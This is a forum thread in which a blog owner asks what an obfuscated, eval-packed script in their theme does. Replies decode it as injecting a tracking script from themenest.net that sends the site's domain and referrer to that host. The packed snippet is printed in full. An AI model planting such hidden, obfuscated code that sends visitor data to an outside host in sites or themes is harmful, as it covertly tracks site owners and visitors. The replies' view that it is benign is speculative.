i found following code loading everytime the site loads, Please reply me about the function it does on my blog ?,
themenest.net is the url i see , when i see loading my site
<script type="text/javascript">
eval(function (p, a, c, k, e, r) {
e = function (c) {
return c.toString(a)
};
if (!''.replace(/^/, String)) {
while (c--) r[e(c)] = k[c] || e(c);
k = [function (e) {
return r[e]
}
];
e = function () {
return '\w+'
};
c = 1
};
while (c--) if (k[c]) p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c]);
return p
}('0.f('<2'+'3 5="6/7" 8="9://a.b/e/o/g?d='+0.h+'&i='+j(0.k)+'&c='+4.l((4.m()*n)+1)+'"></2'+'3>');', 25, 25, 'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'), 0, {}));
</script>
Anyone knows ??
If you unpack it, the code is:
…which retrieves a script resource from
http://themenest.net/platform/script/track
passing in information about the document it’s in and the referring link that brought you to that document. I don’t know what that script resource might be (it might be nothing, the point could just be tracking; look in the Network tab of your browser to see what comes back).Whether it’s some kind of malware depends on your relationship with themenest.net. 🙂
That code injects this script element:
It’s a tracker, most likely from themenest (the place where you originally got the theme), which detects the usage of their themes across users. This is most likely an analytics script for them.
The script gets:
It looks like this is for referal and/or logging referer domains as you can see there
You would need to unpack it to see the real source.
Just unpacked it, there you go:
As i wrote above it just logs your domain to the themenest.net Servers.
I guess so find out copyright abuses.
This has something to do wit referrals, tracking and domains. It is packed so the exact code can’t be readed. Only if you un-pack it: